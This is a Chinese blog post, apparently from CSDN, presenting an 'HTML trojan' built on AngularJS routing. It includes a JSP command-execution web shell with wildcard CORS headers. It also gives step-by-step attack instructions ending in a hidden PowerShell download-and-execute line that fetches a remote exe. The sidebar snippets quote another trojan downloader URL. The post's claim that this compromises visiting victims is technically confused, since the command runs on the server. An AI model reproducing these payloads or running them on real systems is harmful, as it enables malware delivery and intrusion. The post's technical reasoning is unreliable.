【无标题】基于ANGULARJS的HTML木马

最新推荐文章于 2024-06-20 13:02:02 发布
最新推荐文章于 2024-06-20 13:02:02 发布
阅读量196 收藏
点赞数
文章标签: html javascript 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seabird001/article/details/126192968
版权

        传统的html页面机制,由于在默认情况下禁用脚本(例如activeX),或者具有同源策略的功能,同时由于微软对html开发做了很多限制,因此很难在HTML页面上执行相关的动态语言(例如php或者jsp等),使得很难在一定程度下通过受害者主机访问html页面,进而实现APT攻击。

         然而最近我偶然在一次对angularjs的实验中得知,通过angularjs的路由可以实现HTML页面动态加载其他的动态语言(php,jsp等)并将该动态语言界面输出的结果显示在前台,例如使用下面的代码:

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>AngularJS</title>
<script src="angular.js"></script>
<script src="router.js"></script>
<script type="text/javascript">
angular.module('ngRouteExample', ['ngRoute'])
.controller('HomeController', function ($scope, $route) { $scope.$route = $route;})
.controller('AboutController', function ($scope, $route) { $scope.$route = $route;})
.config(function ($routeProvider) {
    $routeProvider.
    when('/home', {
        templateUrl: 'aaa/a.jsp',
        controller: 'HomeController'
    }).	
    otherwise({
        redirectTo: '/home'
    });
});
</script>

</head>

<body ng-app="ngRouteExample" class="ng-scope">
  <script type="text/ng-template" id="a.jsp">
      <h1> Home </h1>
  </script>
  <div> 
    <div id="navigation">  
      <a href="#!/home">Home</a>
    </div>
    <div ng-view="">
    </div>
  </div>
</body>
</html>

a.jsp的代码如下:

<%@ page import="java.io.*" %>
<%
response.setHeader("Access-Control-Allow-Origin", "*");
response.setHeader("Access-Control-Allow-Methods","GET"); 
response.setHeader("Access-Control-Allow-Methods","POST"); 
response.setHeader("Access-Control-Allow-Headers","x-requested-with,content-type"); 
try {
    String cmd = request.getParameter("cmd");
    Process child = Runtime.getRuntime().exec("net user");
    InputStream in = child.getInputStream();
    int c;
    while ((c = in.read()) != -1) {
        out.print((char)c);
    }
    in.close();
    try {
        child.waitFor();
    } catch (InterruptedException e) {
        e.printStackTrace();
    }
} catch (IOException e) {
    System.err.println(e);
}
%>

        可以看到通过angularjs的路由功能,成功实现HTML的命令执行,可以在前端的html页面上输出当前计算机前的用户。因此利用该特性,可以通过该种方式构造指定的HTML界面实现APT攻击。例如通过加载jsp代码实现APT攻击,相关的方法如下:

         1.     启动tomcat服务器

         2.   在tomcat服务器下部署带有angularjs路由的HTML页面

         3.     编写jsp代码,通过Runtime.getRuntime().exec("1.bat")调用powershell下载并执行APT木马,将powershell代码存入1.bat,1.bat中的powershell代码如下:

powershell -WindowStyle Hidden -nop -c (New-Object System.Net.WebClient).DownloadFile('http://ip/a'p't.exe','c:\c.exe');(New-Object -com Shell.Application).ShellExecute('c:\c.exe');

          4.     最后使用受害者主机访问该HTML页面,攻击端主机成功完成APT攻击。

         相关视频演示:

2022-07-24-21-46-46

 

 

 

seabird001
关注
html简单旋转木马
qq_45879198的博客
08-17 2459
文章目录前言一、旋转木马展示二、旋转木马源代码三、该项目所需文件 前言 利用3d动画写了一个旋转木马 提示:以下是本篇文章正文内容,下面案例可供参考 一、旋转木马展示 二、旋转木马源代码 代码如下(示例): <!DOCTYPE html> <html lang="zh-cn"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=
使用html链接上传木马,一段植入木马html代码
weixin_28465009的博客
06-09 3022
评论#re: 一段植入木马html代码2012-06-25 14:47往往v< html >< script language ="VBScript" >on error resume next' 即将下载的木马dl = " ht#tp://ww#w.800vv.com/cc/cj.exe# "' 创建OBJECT元素Set df = docume...
HTML旋转木马(0基础,1分钟学会)
龙猫
06-07 1163
(1) 新建一个文件夹(2) 文件夹中新建img文件夹 以及一个txt文档(3) 把我放在下面的代码粘贴到txt文档中(4)没有txt后缀的这样设置一下(这里以win11为例,点击查看–>显示–>文件扩展名)(5)把文本文档名称改为旋转木马.html(6)把图片放在img文件夹里面,需要9张(7)图片重命名为 1.jpg 2.jpg 3.jpg 以此规律命名(200 x 300 像素的图片)(8)设置图片像素(用win自带照片软件打开–>点击… --> 重设大小–>自定义尺寸–>把宽度改成200、高度改
使用html链接上传木马,通过XSS漏洞进行上传木马文件的过程
weixin_39840235的博客
06-09 1237
然后利用前面的内容构造如下命令:http://192. 168, 157, 144/dvwa/vulnerbilities/sq11/71d-16aubmit-submit"--cookie-"security=low: PHPSESSID-b523(41bb19ecca9a1d0b2b90fecc09b" --dbs --batch启动sqlmap之后的使用界面如所示。启动sqlmap之后的使用...
html代码大全(很全的)_分享一些比较强悍的PHP木马大全源码
weixin_39550172的博客
11-27 2432
由于PHP一句话木马可以说有很多,简单的、中等的、复杂的.......,今天主要是分享一些比较强悍的一些PHP一句话木马大全;一、利用404页面隐藏PHP小马<html><head><title>404 Not Foundtitle>head><body><h1>Not Foundh1><p>The...
angular-carousel:基于angularJS指令的移动友好轮播
05-23
基于angularJS指令的自适应轮播。 安装 您可以通过凉亭安装指令 $ bower install angular-es-carousel 向您的html文件添加依赖项 < script src =" /bower_components/angular-es-carousel/js/esCarousel.js " &...
基于机器学习的木马检测模型的设计与实现(论文)-kaic.docx
04-04
### 基于机器学习的木马检测模型的设计与实现 #### 1. 研究背景 随着互联网技术的快速发展以及人们对网络的高度依赖,网络安全问题变得日益严峻。特别是JavaScript木马,它作为一种隐蔽性强、危害大的恶意软件,对...
基于XGBoost的硬件木马检测方法
10-15
本文介绍了一种基于XGBoost的硬件木马检测新方法,该方法利用环形振荡器网络的分析数据,结合交叉验证进行模型优化。XGBoost是一种强大的梯度提升决策树算法,它可以处理高维度向量数据,并且具有高准确度、快速收敛...
基于Android的木马检测引擎的研究与实现
01-19
近几年来,Android手机木马病毒发展迅速,Android手机安全问题成为大家关注的焦点,基于Android的木马检测引擎的研究与实现变得日益迫切。为此,提出了一套特征码提取检测算法(FCPA),FCPA通过调用Android系统...
基于残差神经网络的木马通信流量分析研究.pdf
09-25
"基于残差神经网络的木马通信流量分析研究" 本文研究了一种基于残差神经网络的木马通信流量分析方法,以提高木马流量检测的准确率。该方法首先将木马流量应用层中的未加密信息作为分析对象,自动抽取流量特征并映射...
html木马制作教程,利用Internet Explorer Object Data漏洞制做全新网页木马
weixin_39886024的博客
06-08 780
今年8月20日,微软公布了一个最高严重等级的重要漏洞--Internet Explorer Object数据远程执行漏洞。这对于网页木马爱好者来说可是一件好事,我们可以用这个漏洞来制做一款全新的暂时不会被查杀的木马了。在介绍如何制做这个全新网页木马前我先给大家简单介绍一下该漏洞。一、漏洞描述该漏洞内由eEye Digital Security发现并于8月20号公布的,微软同一天也发布了相应的公告。...
css3实现旋转木马案例
dream_follower的博客
02-25 2376
效果如下: 代码如下: 这个找了六张图片,放到了div里,然后每一张图片依次旋转60度,然后再沿着z轴向外移动,不能先移动再旋转,因为旋转的时候,坐标轴也进行了旋转。 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Title&lt...
网页木马使用
超哥的专栏
04-22 3187
准备好木马程序 server.exe 将木马程序拷贝到web服务目录下 使用网马生成工具生成web服务 生成后 将web服务拷贝到web服务目录下 配置一下IE 连接测试 ...
HTML+CSS 3D旋转木马
WCvison的博客
03-11 747
HTML+CSS 3D旋转木马 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0">
HTML
小马的博客
04-14 416
HTML简介 HTML是HyperText Markup Language的简写,叫超文本标记语言、网页语言。 标记即标签,html所有的操作都是通过标签实现的。 HTML的规范 一个html开始标签和结束标签:<html> </html> html包含两部分内容: (1)<head>设置相关信息</head> (2)<body>显示在...
html文本被木马病毒植入vbs脚本
最新发布
little_kid_pea的博客
06-20 481
还是只是在临时文件夹下创建一个名为svchost.exe的文件,windows系统也有一个同名的文件,而且是个重要的程序,给文件起这个名字显然是病毒做的伪装。然后会执行这个文件。我觉得vbs好可怕,居然可以在浏览器中操作文件系统,把他们的病毒程序植入本地文件系统并执行,vbs甚至可以不经用户同意删除文件,如果把windows的必要文件删了,windows系统直接死机启动不了。我在公司服务器上写了一个静态html,方便导航,结果没过多久发现html文件被修改了,在标签后加了这些代码。
css3+html5实现旋转木马
m0_57023359的博客
08-29 247
利用css3写的旋转木马,有需要自取
手机邮件打开一个html会中木马,小心,QQ邮件中的木马
weixin_32736961的博客
06-24 1736
小心,QQ邮件中的木马!文/图冰河洗剑最近,笔者的QQ邮箱中经常收到一些莫名其妙的邮件和贺卡,让你看一段视频了什么的,这只是垃圾邮件吗?每次笔者看到这些邮件,都毫不犹豫的将其删除,绝对不打开查看——因为,这些看似无关紧要的邮件中,很可能就夹带着木马!一、QQ邮箱漏洞与木马传播在新版的QQ邮箱中,存在着一个很严重的挂马漏洞,恶意攻击者可以在邮件中输入恶意代码,让其它用户中招后台下载运行木马。与一般...
谈网页木马
言出必行
05-16 3564
当今网络,反病毒软件日益增多,使用的反病毒技术越来越先进,查杀病毒的能力逐渐提高,但病毒制作者并不会罢休,反查杀手段不断升级,新的病毒层出不穷,形式也越来越多样化,为了躲避查杀,病毒自身的隐蔽性越来越高,针对反病毒软件对传统的病毒传播途径的监控能力提高,造成病毒传播困难的问题,越来越多的病毒,利用多数反病毒软件产品对恶意脚本监控能力的缺陷,开始利用网页木马这一危害面最广泛,传播效果最佳的方式来传播
基于分层聚类的木马通信行为检测模型
"本文介绍了基于分层聚类方法的木马通信行为检测模型,重点探讨了远程控制型木马的检测,以及基于主机和网络的木马检测方法的分类。" 在网络安全领域,木马病毒是一种极具威胁的恶意软件,它们通常以隐蔽的方式运行...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值